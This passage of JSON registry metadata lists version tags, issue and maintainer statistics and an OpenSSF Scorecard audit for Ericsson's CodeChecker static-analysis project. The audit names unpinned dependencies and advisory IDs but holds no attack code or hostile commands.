ries/Ericsson%2Fcodechecker/tags/v5.1/manifests"},{"name":"v5.0","sha":"5bb577a9c03bbe78317a4a57d20c0c1e3a3064d0","kind":"commit","published_at":"2015-11-11T10:02:45.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v5.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.0/manifests"},{"name":"v4.0","sha":"72075b4a94b791cee9f434ea5d06c702e2fce16d","kind":"commit","published_at":"2015-08-26T13:33:23.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v4.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v4.0/manifests"}]},"repo_metadata_updated_at":"2025-08-19T18:14:34.537Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":9.345852080216646,"dependent_packages_count":6.999148183520997,"stargazers_count":null,"forks_count":null,"average":8.172500131868823},"purl":"pkg:golang/github.com/%21ericsson/codechecker","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/go/github.com/Ericsson/codechecker","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/go/github.com/Ericsson/codechecker","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/go/github.com/Ericsson/codechecker/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2025-08-10T06:58:09.855Z","issues_count":289,"pull_requests_count":576,"avg_time_to_close_issue":24131448.2,"avg_time_to_close_pull_request":3397393.635220126,"issues_closed_count":110,"pull_requests_closed_count":477,"pull_request_authors_count":72,"issue_authors_count":116,"avg_comments_per_issue":1.6678200692041523,"avg_comments_per_pull_request":0.7586805555555556,"merged_pull_requests_count":412,"bot_issues_count":0,"bot_pull_requests_count":59,"past_year_issues_count":89,"past_year_pull_requests_count":224,"past_year_avg_time_to_close_issue":3579611.04,"past_year_avg_time_to_close_pull_request":1482183.1176470588,"past_year_issues_closed_count":25,"past_year_pull_requests_closed_count":170,"past_year_pull_request_authors_count":37,"past_year_issue_authors_count":52,"past_year_avg_comments_per_issue":1.0337078651685394,"past_year_avg_comments_per_pull_request":0.5491071428571429,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":22,"past_year_merged_pull_requests_count":143,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/issues","maintainers":[{"login":"dkrupp","count":73,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dkrupp"},{"login":"vodorok","count":56,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vodorok"},{"login":"Szelethus","count":55,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Szelethus"},{"login":"whisperity","count":49,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/whisperity"},{"login":"cservakt","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cservakt"},{"login":"gamesh411","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gamesh411"},{"login":"gulyasgergely902","count":24,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gulyasgergely902"},{"login":"noraz31","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/noraz31"},{"login":"feyruzb","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/feyruzb"},{"login":"stt08","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/stt08"},{"login":"barnabasdomozi","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/barnabasdomozi"},{"login":"xb058t","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xb058t"},{"login":"csordasmarton","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/csordasmarton"}],"active_maintainers":[{"login":"dkrupp","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dkrupp"},{"login":"gulyasgergely902","count":24,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gulyasgergely902"},{"login":"gamesh411","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gamesh411"},{"login":"noraz31","count":16,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/noraz31"},{"login":"cservakt","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cservakt"},{"login":"feyruzb","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/feyruzb"},{"login":"barnabasdomozi","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/barnabasdomozi"},{"login":"xb058t","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xb058t"},{"login":"stt08","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/stt08"},{"login":"Szelethus","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Szelethus"},{"login":"whisperity","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/whisperity"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2FEricsson%2Fcodechecker/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2FEricsson%2Fcodechecker/version_numbers","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2FEricsson%2Fcodechecker/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2FEricsson%2Fcodechecker/related_packages","maintainers":[],"registry":{"name":"proxy.golang.org","url":"https://proxy.golang.org","ecosystem":"go","default":true,"packages_count":1954233,"maintainers_count":0,"namespaces_count":741771,"keywords_count":109320,"github":"golang","metadata":{"funded_packages_count":49342},"icon_url":"https://github.com/golang.png","created_at":"2022-04-04T15:19:22.939Z","updated_at":"2025-09-08T05:47:38.872Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/namespaces"}},{"id":1538459,"name":"codechecker-api","ecosystem":"npm","description":"Generated node.js compatible API stubs for CodeChecker server.","homepage":"https://github.com/Ericsson/codechecker","licenses":"SEE LICENSE IN LICENSE","normalized_licenses":["ICU"],"repository_url":"https://github.com/Ericsson/codechecker","keywords_array":["codechecker","thrift","api"],"namespace":null,"versions_count":62,"first_release_published_at":"2020-02-17T13:23:29.510Z","latest_release_published_at":"2021-01-28T10:55:03.360Z","latest_release_number":"6.39.0","last_synced_at":"2025-08-19T18:10:29.038Z","created_at":"2022-04-09T05:00:23.910Z","updated_at":"2025-08-19T18:14:34.544Z","registry_url":"https://www.npmjs.com/package/codechecker-api","install_command":"npm install codechecker-api","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"latest":"6.39.0","dev":"6.39.0-dev1"}},"repo_metadata":{"id":37431651,"uuid":"37459110","full_name":"Ericsson/codechecker","owner":"Ericsson","description":"CodeChecker is an analyzer tooling, defect database and viewer extension for static and dynamic analyzer tools.","archived":false,"fork":false,"pushed_at":"2025-08-19T16:09:45.000Z","size":44800,"stargazers_count":2443,"open_issues_count":456,"forks_count":424,"subscribers_count":52,"default_branch":"master","last_synced_at":"2025-08-19T17:45:59.071Z","etag":null,"topics":["analysis","c","clang","clang-tidy","codechecker","cpp","database","defects","docker","linux","llvm","macosx","objective-c","results-viewer","static-analysis","static-analyzer","static-analyzers","vue"],"latest_commit_sha":null,"homepage":"https://codechecker.readthedocs.io","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"apache-2.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Ericsson.png","metadata":{"files":{"readme":"docs/README.md","changelog":null,"contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE.TXT","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":"CODEOWNERS","security":"SECURITY.md","support":"docs/supported_code_analyzers.md","governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null}},"created_at":"2015-06-15T10:38:51.000Z","updated_at":"2025-08-19T16:09:49.000Z","dependencies_parsed_at":"2023-09-29T11:42:30.441Z","dependency_job_id":"50b5428a-2bdc-4def-b0a6-a46baec9079d","html_url":"https://github.com/Ericsson/codechecker","commit_stats":{"total_commits":3749,"total_committers":127,"mean_commits":"29.519685039370078","dds":0.6054947986129635,"last_synced_commit":"4234fb7b91d07681ee032862fbb096197d5f104a"},"previous_names":[],"tags_count":90,"template":false,"template_full_name":null,"purl":"pkg:github/Ericsson/codechecker","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Ericsson","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/sbom","scorecard":{"id":46490,"data":{"date":"2025-08-11","repo":{"name":"github.com/Ericsson/codechecker","commit":"49a939ab451d1b2a06553f17c4635a306527c33a"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.9,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 4 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/codechecker_master_analysis.yml:1","Warn: no topLevel permission defined: .github/workflows/codechecker_pr_analysis.yml:1","Info: topLevel permissions set to 'read-all': .github/workflows/config_coverage.yml:24","Info: topLevel permissions set to 'read-all': .github/workflows/docker.yml:8","Info: topLevel permissions set to 'read-all': .github/workflows/pypi.yml:9","Info: topLevel permissions set to 'read-all': .github/workflows/snap.yml:8","Info: topLevel permissions set to 'read-all': .github/workflows/test.yml:6","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.TXT:0","Info: FSF or OSI recognized license: Apache License 2.0: LICENSE.TXT:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/docker.yml:11"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codechecker_master_analysis.yml:17: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/codechecker_master_analysis.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codechecker_master_analysis.yml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/codechecker_master_analysis.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codechecker_pr_analysis.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/codechecker_pr_analysis.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codechecker_pr_analysis.yml:17: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/codechecker_pr_analysis.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/config_coverage.yml:31: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/config_coverage.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/config_coverage.yml:32: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/config_coverage.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/config_coverage.yml:51: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/config_coverage.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/docker.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/docker.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/docker.yml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/docker.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/docker.yml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/docker.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/docker.yml:31: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/docker.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/pypi.yml:17: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/pypi.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/pypi.yml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/pypi.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/pypi.yml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/pypi.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/pypi.yml:47: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/pypi.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/pypi.yml:64: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/pypi.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/pypi.yml:68: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/pypi.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/snap.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/snap.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/snap.yml:17: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/snap.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/snap.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/snap.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:91: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:92: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:117: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:118: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:154: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:199: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: containerImage not pinned by hash: docker/Dockerfile.test.sqlite.clang11.bionic:1: pin your Docker image by updating ubuntu:18.04 to ubuntu:18.04@sha256:152dc042452c496007f07ca9127571cb9c29697f42acbfad72324b2bb2e43c98","Warn: containerImage not pinned by hash: docker/Dockerfile.test.sqlite.clang11.xenial:1: pin your Docker image by updating ubuntu:16.04 to ubuntu:16.04@sha256:1f1a2d56de1d604801a9671f301190704c25d604a416f59e03c04f5c6ffee0d6","Warn: containerImage not pinned by hash: docker/thrift/Dockerfile.thrift.noble:1: pin your Docker image by updating ubuntu:24.04 to ubuntu:24.04@sha256:a08e551cb33850e4740772b38217fc1796a66da2506d312abe51acda354ff061","Warn: containerImage not pinned by hash: web/docker/Dockerfile:5","Warn: containerImage not pinned by hash: web/docker/Dockerfile:43: pin your Docker image by updating python:3.10.16-slim-bullseye to python:3.10.16-slim-bullseye@sha256:c758f6d42a79466e943350a2c5273a09767bddc16a81d381ed21675a382205ee","Warn: pipCommand not pinned by hash: docker/Dockerfile.test.sqlite.clang11.bionic:3-29","Warn: pipCommand not pinned by hash: docker/Dockerfile.test.sqlite.clang11.bionic:3-29","Warn: pipCommand not pinned by hash: docker/Dockerfile.test.sqlite.clang11.xenial:3-33","Warn: pipCommand not pinned by hash: docker/Dockerfile.test.sqlite.clang11.xenial:3-33","Warn: downloadThenRun not pinned by hash: web/docker/Dockerfile:16-23","Warn: pipCommand not pinned by hash: web/docker/Dockerfile:91-119","Warn: pipCommand not pinned by hash: web/docker/Dockerfile:91-119","Warn: pipCommand not pinned by hash: web/docker/Dockerfile:91-119","Warn: pipCommand not pinned by hash: web/docker/Dockerfile:91-119","Warn: pipCommand not pinned by hash: .github/workflows/codechecker_master_analysis.yml:23","Warn: pipCommand not pinned by hash: .github/workflows/codechecker_master_analysis.yml:24","Warn: pipCommand not pinned by hash: .github/workflows/codechecker_pr_analysis.yml:22","Warn: pipCommand not pinned by hash: .github/workflows/codechecker_pr_analysis.yml:23","Warn: pipCommand not pinned by hash: .github/workflows/pypi.yml:103","Warn: pipCommand not pinned by hash: .github/workflows/pypi.yml:104","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:26","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:51","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:58","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:64","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:70","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:77","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:83","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:125","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:177","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:217","Info:   0 out of  28 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   6 third-party GitHubAction dependencies pinned","Info:   0 out of   5 containerImage dependencies pinned","Info:   0 out of  24 pipCommand dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":0,"reason":"24 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: PYSEC-2025-49 / GHSA-5rjg-fvgr-3xxf","Warn: Project is vulnerable to: GHSA-9hjg-9r4m-mvj7","Warn: Project is vulnerable to: GHSA-3ww4-gg4f-jr7f","Warn: Project is vulnerable to: PYSEC-2024-225 / GHSA-6vqw-3v5j-54x4","Warn: Project is vulnerable to: GHSA-9v9h-cgj8-h64p","Warn: Project is vulnerable to: GHSA-h4gh-qq45-vh27","Warn: Project is vulnerable to: PYSEC-2023-254 / GHSA-jfhm-5ghh-2f97","Warn: Project is vulnerable to: GHSA-v6h2-p8h4-qcjw","Warn: Project is vulnerable to: GHSA-gxpj-cx7g-858c","Warn: Project is vulnerable to: GHSA-2j2x-2gpw-g8fm","Warn: Project is vulnerable to: GHSA-fjxv-7rqg-78g4","Warn: Project is vulnerable to: GHSA-2p57-rm9w-gvfp","Warn: Project is vulnerable to: GHSA-f8q6-p94x-37v3","Warn: Project is vulnerable to: GHSA-76c9-3jph-rj3q","Warn: Project is vulnerable to: GHSA-7fh5-64p2-3v2j","Warn: Project is vulnerable to: GHSA-p8p7-x288-28g6","Warn: Project is vulnerable to: GHSA-f5x3-32g6-xq36","Warn: Project is vulnerable to: GHSA-72xf-g2v4-qvf3","Warn: Project is vulnerable to: GHSA-cchq-frgv-rjh5","Warn: Project is vulnerable to: GHSA-g644-9gfx-q4q4","Warn: Project is vulnerable to: GHSA-5j4c-8p2g-v4jx","Warn: Project is vulnerable to: GHSA-g3ch-rx76-35fx","Warn: Project is vulnerable to: GHSA-4v9v-hfq4-rm2v","Warn: Project is vulnerable to: GHSA-9jgg-88mc-972h"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-14T22:53:38.249Z","repository_id":37431651,"created_at":"2025-08-14T22:53:38.249Z","updated_at":"2025-08-14T22:53:38.249Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":271198843,"owners_count":24717130,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-08-19T02:00:09.176Z","response_time":63,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"Ericsson","name":"Ericsson","uuid":"4161311","kind":"organization","description":"Home for Ericsson's Open Source software","email":"opensource@ericsson.com","website":"http://www.ericsson.com","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/4161311?v=4","repositories_count":119,"last_synced_at":"2024-04-15T22:07:40.334Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/Ericsson","funding_links":[],"total_stars":4306,"followers":165,"following":0,"created_at":"2022-11-05T10:49:44.232Z","updated_at":"2024-04-15T22:07:56.651Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Ericsson","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Ericsson/repositories"},"tags":[{"name":"v6.26.1","sha":"b7810134193a48f9ec33da861b1e308f7ed553b8","kind":"commit","published_at":"2025-07-10T17:42:22.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.26.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.26.1/manifests"},{"name":"v6.26.0","sha":"0bbf351e870c7056cd9cc0dc44a795c0fe805dfa","kind":"commit","published_at":"2025-06-06T23:31:28.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.26.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.26.0/manifests"},{"name":"v6.26.0-rc1","sha":"e0b9374245f88450d5b6dc4b164f78d9e2f06cfb","kind":"commit","published_at":"2025-04-28T09:21:09.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/